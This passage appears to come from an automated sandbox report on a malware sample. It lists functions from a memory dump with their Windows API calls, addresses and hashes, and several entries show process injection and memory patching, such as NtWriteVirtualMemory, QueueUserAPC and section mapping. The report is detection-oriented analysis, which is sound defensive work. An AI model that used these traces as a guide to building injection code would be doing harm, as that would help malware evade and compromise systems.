                                                            • Instruction Fuzzy Hash: 9DF0FE71510309FBEB05DBD4D95AFDEBBBCEB14706F104058A601A7080EBB8EB15DB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBA42B, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,04BA493D,00000000,?,04BA493D,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 04BBA449
                                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04BBA458
                                                            • SetLastError.KERNEL32(00000000,?,04BA493D,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 04BBA45F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$LastMemoryStatusVirtualWrite
                                                            • String ID:
                                                            • API String ID: 1089604434-0
                                                            • Opcode ID: 7c8355ec64483440b39dfe9dcd96257febde9aa75944cb4fc1ff76f31e9d1062
                                                            • Instruction ID: b70f675fc0dfa1dbbe7d2ca9db95c3213d9fea3dd1d374690062256411ed3b1f
                                                            • Opcode Fuzzy Hash: 7c8355ec64483440b39dfe9dcd96257febde9aa75944cb4fc1ff76f31e9d1062
                                                            • Instruction Fuzzy Hash: 5FE09A3260021AABCF015EE8EC49DEB7B6DFB0C751B048465BA41D6521D779EC61ABF0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBA21F, Relevance: 3.1, APIs: 2, Instructions: 71nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 04BBA27C
                                                              • Part of subcall function 04BB680B: NtMapViewOfSection.NTDLL(00000000,000000FF,04BBA293,00000000,00000000,04BBA293,00000000,00000002,00000000,?,?,00000000,04BBA293,000000FF,00000000), ref: 04BB6839
                                                            • memset.NTDLL ref: 04BBA2A0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID:
                                                            • API String ID: 2533685722-0
                                                            • Opcode ID: b06a8f72736a70666d1060f66aa4b0b0f78777712d0e211eb78cd8509917415e
                                                            • Instruction ID: 50e40a0f217114c1636cde14a86e369babbb07e06d6c4dc9ecd59d8102294604
                                                            • Opcode Fuzzy Hash: b06a8f72736a70666d1060f66aa4b0b0f78777712d0e211eb78cd8509917415e
                                                            • Instruction Fuzzy Hash: F8214FB1E00209AFDB10DFA9C8809EEFBF9EF48314F104569E555F3250D771AA458FA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA6EB0, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 04BA6ED9
                                                            • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BA9375,00000000,00000000,00000028,00000100), ref: 04BA6EFB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressMemory64ProcReadVirtualWow64
                                                            • String ID:
                                                            • API String ID: 752694512-0
                                                            • Opcode ID: cd68647fc823771caa376e256ff1cf6f2346bb0153787cdc33817b3d41d40e76
                                                            • Instruction ID: 32dd04f33df15145bf0cf8eaee8b6ea0d72b0a5b4c812d966c8bb78aed075c6d
                                                            • Opcode Fuzzy Hash: cd68647fc823771caa376e256ff1cf6f2346bb0153787cdc33817b3d41d40e76
                                                            • Instruction Fuzzy Hash: 9DF0E7B6504109BF8F118F9ADC84C5ABFBAEB98250B19405AF544D3220D771E961DB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB680B, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,04BBA293,00000000,00000000,04BBA293,00000000,00000002,00000000,?,?,00000000,04BBA293,000000FF,00000000), ref: 04BB6839
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                            • Instruction ID: dff6e031477184e7f5b4d4b612b5d8ef949dcc874c5baf68af1c5a84c858ea40
                                                            • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                            • Instruction Fuzzy Hash: 28F0FEB690020CBFDB119FA5CC85CEFBBBDEB44244B00886AB58691050D271AE189B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB0FA5, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,04BCC300), ref: 04BB0FBC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID:
                                                            • API String ID: 1778838933-0
                                                            • Opcode ID: bcb11b624c1a74d6e732f370a13fa5c98e93ebc4658446bfb66623fad3a9c314
                                                            • Instruction ID: 0b15b5a0669394085a495f69a7b37915178abdef0a36c5f1ee2180678cbe3157
                                                            • Opcode Fuzzy Hash: bcb11b624c1a74d6e732f370a13fa5c98e93ebc4658446bfb66623fad3a9c314
                                                            • Instruction Fuzzy Hash: 3CF0343130012A9B8B20EE59C894DFFBBA8EB25754B00C195F944EB250E260FD46CBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA6975, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA699E
                                                            • RtlDeleteCriticalSection.NTDLL(04BCC2E0), ref: 04BA69D1
                                                            • RtlDeleteCriticalSection.NTDLL(04BCC300), ref: 04BA69D8
                                                            • CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A07
                                                            • ReleaseMutex.KERNEL32(00000428,00000000,?,?,?,04BC3A85), ref: 04BA6A18
                                                            • CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A24
                                                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BC3A85), ref: 04BA6A30
                                                            • CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A3C
                                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA6A42
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04BC3A85), ref: 04BA6A56
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04BC3A85), ref: 04BA6A79
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(050305B8), ref: 04BA6AB2
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04BC3A85), ref: 04BA6ACE
                                                            • CloseHandle.KERNEL32(05C88558,?,?,04BC3A85), ref: 04BA6AF5
                                                            • LocalFree.KERNEL32(?,?,04BC3A85), ref: 04BA6B05
                                                              • Part of subcall function 04BAFBEE: GetVersion.KERNEL32(?,00000000,73BCF720,?,04BA698F,00000000,?,?,?,04BC3A85), ref: 04BAFC12
                                                              • Part of subcall function 04BAFBEE: GetModuleHandleA.KERNEL32(?,05C89759,?,04BA698F,00000000,?,?,?,04BC3A85), ref: 04BAFC2F
                                                              • Part of subcall function 04BAFBEE: GetProcAddress.KERNEL32(00000000), ref: 04BAFC36
                                                              • Part of subcall function 04BACFBA: RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BACFC4
                                                              • Part of subcall function 04BACFBA: RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BAD000
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                            • String ID:
                                                            • API String ID: 1924086638-0
                                                            • Opcode ID: ba854fd4e192133cc7c559c09351af60f730138936200ebfc78369fb2f81c16a
                                                            • Instruction ID: cc9f763d5911ad374ccb678b3798bb8f23cafaf59e2659da5640f2b07b255eee
                                                            • Opcode Fuzzy Hash: ba854fd4e192133cc7c559c09351af60f730138936200ebfc78369fb2f81c16a
                                                            • Instruction Fuzzy Hash: 094174B1604201DFDB20EFA5ECC4A687B79FB2834570840A7F649E7150D779ACB68B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA2577, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25C4
                                                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25D6
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BA25E5
                                                            • VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25F6
                                                            • VirtualProtect.KERNEL32(?,00000005,00000040,00000400,04BC84F0,00000018,04BAA14E,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000), ref: 04BA262C
                                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA2647
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,04BC84F0,00000018,04BAA14E,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000), ref: 04BA265C
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,04BC84F0,00000018,04BAA14E,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000), ref: 04BA2689
                                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA26A3
                                                            • GetLastError.KERNEL32(?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA26AA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3676034644-0
                                                            • Opcode ID: d6095790232b4bcf4558b60224d5d278608a4185c962323ae910cb17dfd9092d
                                                            • Instruction ID: 701978894990da7f7dd11453d5f5492b86c2d67616e8a748b8b7901e09f248f2
                                                            • Opcode Fuzzy Hash: d6095790232b4bcf4558b60224d5d278608a4185c962323ae910cb17dfd9092d
                                                            • Instruction Fuzzy Hash: 04414D71904709AFDB359FA8CC84EAAB7F5FB08310F048599E656A76A0E734F815DF20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBB94E, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA92F3: GetProcAddress.KERNEL32(?,00000318), ref: 04BA9318
                                                              • Part of subcall function 04BA92F3: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BA9334
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB987
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BBBA72
                                                              • Part of subcall function 04BA92F3: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BA949E
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BBB9BD
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB9C9
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA06
                                                            • StrChrA.SHLWAPI(?,0000002E), ref: 04BBBA0F
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                            • String ID:
                                                            • API String ID: 3901270786-0
                                                            • Opcode ID: 235d8f35be2b4aa0eca807b3df263cd7a689183fea5bcb419be503c87250f951
                                                            • Instruction ID: 0ca46b8dc9ced342725b4205d2505f89a875ce7a1d4758d57da0058d2fb992eb
                                                            • Opcode Fuzzy Hash: 235d8f35be2b4aa0eca807b3df263cd7a689183fea5bcb419be503c87250f951
                                                            • Instruction Fuzzy Hash: F3316271508311ABD321CF15C840BABBBE8FF89B55F000959F8C567641DB74F905CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC04BB, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BBAB41: memset.NTDLL ref: 04BBAB4B
                                                            • OpenEventA.KERNEL32(00000002,00000000,04BCC1E4,?,00000000,00000000,?,04BB22F6), ref: 04BC0555
                                                            • SetEvent.KERNEL32(00000000,?,04BB22F6), ref: 04BC0562
                                                            • Sleep.KERNEL32(00000BB8,?,04BB22F6), ref: 04BC056D
                                                            • ResetEvent.KERNEL32(00000000,?,04BB22F6), ref: 04BC0574
                                                            • CloseHandle.KERNEL32(00000000,?,04BB22F6), ref: 04BC057B
                                                            • GetShellWindow.USER32 ref: 04BC0586
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 04BC058D
                                                              • Part of subcall function 04BC1C1F: RegCloseKey.ADVAPI32(?), ref: 04BC1CA2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                            • String ID:
                                                            • API String ID: 53838381-0
                                                            • Opcode ID: 745646c6f4963bca5d3a3bdea2c705359662fb41f48801fdd2fb89d5a2c2bed5
                                                            • Instruction ID: c9dd1918d106cfa1c7256a3fd83396f27789de9bd7775dc3756f91bbafe12128
                                                            • Opcode Fuzzy Hash: 745646c6f4963bca5d3a3bdea2c705359662fb41f48801fdd2fb89d5a2c2bed5
                                                            • Instruction Fuzzy Hash: 1B218E72600110AFD2206AA6ECC9E6B7B6DEB8E615B10418AF65AD7140DB38AC109BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB9496, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BB94B9
                                                              • Part of subcall function 04BB527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB529A
                                                              • Part of subcall function 04BB527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52AB
                                                              • Part of subcall function 04BB527F: CloseHandle.KERNEL32(00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52BE
                                                            • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 04BB9573
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04BB9581
                                                            • SuspendThread.KERNEL32(?), ref: 04BB9594
                                                              • Part of subcall function 04BB969C: memset.NTDLL ref: 04BB995D
                                                            • ResumeThread.KERNEL32(?), ref: 04BB9617
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ProcessResumememset$CloseHandleObjectOpenSingleSuspendWaitWow64
                                                            • String ID:
                                                            • API String ID: 568453049-0
                                                            • Opcode ID: f3cf74557be90be90e72d0774a7ca6a0e60d7c2c2b462579489a54003d6fc796
                                                            • Instruction ID: 057d3d097bf62e72ca9d9805ae467fb44001bbb9fef84ecd95eb63bb533060d2
                                                            • Opcode Fuzzy Hash: f3cf74557be90be90e72d0774a7ca6a0e60d7c2c2b462579489a54003d6fc796
                                                            • Instruction Fuzzy Hash: A2415FB1900208AFEF219F64CCC4EFE7BB9EF04354F1444A6EA8696150D7B5EE51DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBA74F, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(04BBC495,?,?,00000402,04BBC495,04BC8570,00000018,04BAA0D1,?,00000402,04BCB7A4,04BCB7A0,-0000000C,00000000), ref: 04BBA792
                                                            • VirtualProtect.KERNEL32(00000000,00000004,04BBC495,04BBC495,00000000,00000004,04BBC495,04BCB7A4,04BBC495,?,?,00000402,04BBC495,04BC8570,00000018,04BAA0D1), ref: 04BBA81D
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BBA845
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BBA863
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                            • String ID:
                                                            • API String ID: 3666628472-0
                                                            • Opcode ID: 0f28974e5ac4ae297e7e2a9a4fe31ee884ea5fd3cdcc3653b60fcaf579fbac1c
                                                            • Instruction ID: 6cac88ce93d5fb716399686d0502c4c6cba4d7f778c8dbc4b31eb29d0e363381
                                                            • Opcode Fuzzy Hash: 0f28974e5ac4ae297e7e2a9a4fe31ee884ea5fd3cdcc3653b60fcaf579fbac1c
                                                            • Instruction Fuzzy Hash: 76415B70D00615EFDB11DFA5C884AADBBF4FF48340B10859AE895EB260D7B4BA51CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAF7AF, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BB97AB,?,?,?,00000000,00000000), ref: 04BAF7D4
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF7F6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF80C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF822
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF838
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF84E
                                                              • Part of subcall function 04BBA21F: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 04BBA27C
                                                              • Part of subcall function 04BBA21F: memset.NTDLL ref: 04BBA2A0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 3012371009-0
                                                            • Opcode ID: ed09118bd6fb98fcd5eeb1d04edaa790bf96ff5aef0f7fd0e664632b58aad680
                                                            • Instruction ID: 12967e28b4ac882fbb7ce64de1237ad9e6fb0da9eeabe8574eb8b23a5a2b8632
                                                            • Opcode Fuzzy Hash: ed09118bd6fb98fcd5eeb1d04edaa790bf96ff5aef0f7fd0e664632b58aad680
                                                            • Instruction Fuzzy Hash: BB218DB1A0030ADFDB50DF69C8C0EAA7BFCEB0D384B058566E549C7211E774E9148B71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAE0F2, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,04BC0483), ref: 04BAE109
                                                            • QueueUserAPC.KERNEL32(?,00000000,04BB5ADA,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE11E
                                                            • GetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE129
                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE133
                                                            • CloseHandle.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE13A
                                                            • SetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE143
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 3832013932-0
                                                            • Opcode ID: 52b8b3fa0b3e193a08f9d78fa87a53e8840ca06f73ff0e64f440e586f8c7100a
                                                            • Instruction ID: f23ecc8aa1b0138c12ce6530889be036e35b904dc49b996259d03f2f9489a157
                                                            • Opcode Fuzzy Hash: 52b8b3fa0b3e193a08f9d78fa87a53e8840ca06f73ff0e64f440e586f8c7100a
                                                            • Instruction Fuzzy Hash: 01F0F872645621ABD7221BA1ECC8F5ABFA9FF0C753F054416F606A2150D7299C208BB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB046C, Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC21CB: VirtualProtect.KERNEL32(04BBC495,?,00000040,?,04BCB7A4,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000), ref: 04BC21F0
                                                              • Part of subcall function 04BC21CB: GetLastError.KERNEL32(?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC21F8
                                                              • Part of subcall function 04BC21CB: VirtualQuery.KERNEL32(04BBC495,04BCB7A4,0000001C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC220F
                                                              • Part of subcall function 04BC21CB: VirtualProtect.KERNEL32(04BBC495,?,-2C9B417C,?,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC2234
                                                            • GetLastError.KERNEL32(00000000,00000004,04BAA09A,?,810C74FC,00000000,?,04BC8560,0000001C,04BA9E36,00000002,04BBC495,00000001,0000000C,04BCB7A0,0000000C), ref: 04BB05C5
                                                              • Part of subcall function 04BAFB2B: lstrlen.KERNEL32(04BCB620,04BCB7A4,00000402,04BCB7A4), ref: 04BAFB63
                                                              • Part of subcall function 04BAFB2B: lstrcpy.KERNEL32(00000000,04BCB620), ref: 04BAFB7A
                                                              • Part of subcall function 04BAFB2B: StrChrA.SHLWAPI(00000000,0000002E), ref: 04BAFB83
                                                              • Part of subcall function 04BAFB2B: GetModuleHandleA.KERNEL32(00000000), ref: 04BAFBA1
                                                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,04BBC495,?,04BCB620,04BBC495,?,00000000,00000004,04BAA09A,?,810C74FC), ref: 04BB0543
                                                            • VirtualProtect.KERNEL32(04BCB7A4,00000004,04BAA09A,04BAA09A,04BBC495,?,00000000,00000004,04BAA09A,?,810C74FC,00000000,?,04BC8560,0000001C,04BA9E36), ref: 04BB055E
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BB0582
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BB05A0
                                                              • Part of subcall function 04BC21CB: SetLastError.KERNEL32(0000000C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC223D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 899430048-0
                                                            • Opcode ID: 2986f9a0c0670a695ab8b63f132abffd5a86f16caaf50850d0a52c1081caccaf
                                                            • Instruction ID: c9da94f422e984c5186ee00aae3674f99b22b03a517e6c674e8489943864a5b6
                                                            • Opcode Fuzzy Hash: 2986f9a0c0670a695ab8b63f132abffd5a86f16caaf50850d0a52c1081caccaf
                                                            • Instruction Fuzzy Hash: AD413CB1900619AFDB10EF65C885AFEBBB4FF09310F008199E959AB650D774E950CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB68B2, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                            • RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                            • HeapFree.KERNEL32(00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6934
                                                            • RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                            • String ID:
                                                            • API String ID: 1633053242-0
                                                            • Opcode ID: 4792e4b613b865e86f83fd6bb6ededed5c962bacfa6ca0005d13e066f664c039
                                                            • Instruction ID: ccfbb25eec09c15e8dba4c34f3ee1401015d9870d20afdf0995a608795cb2967
                                                            • Opcode Fuzzy Hash: 4792e4b613b865e86f83fd6bb6ededed5c962bacfa6ca0005d13e066f664c039
                                                            • Instruction Fuzzy Hash: B81146B2200109FFDB019FA4DCC4CEE7BBEFB9C254B11046AF945A3210E671AE519BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC21CB, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(04BBC495,?,00000040,?,04BCB7A4,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000), ref: 04BC21F0
                                                            • GetLastError.KERNEL32(?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC21F8
                                                            • VirtualQuery.KERNEL32(04BBC495,04BCB7A4,0000001C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC220F
                                                            • VirtualProtect.KERNEL32(04BBC495,?,-2C9B417C,?,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC2234
                                                            • SetLastError.KERNEL32(0000000C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC223D
                                                            Memory Dump Source
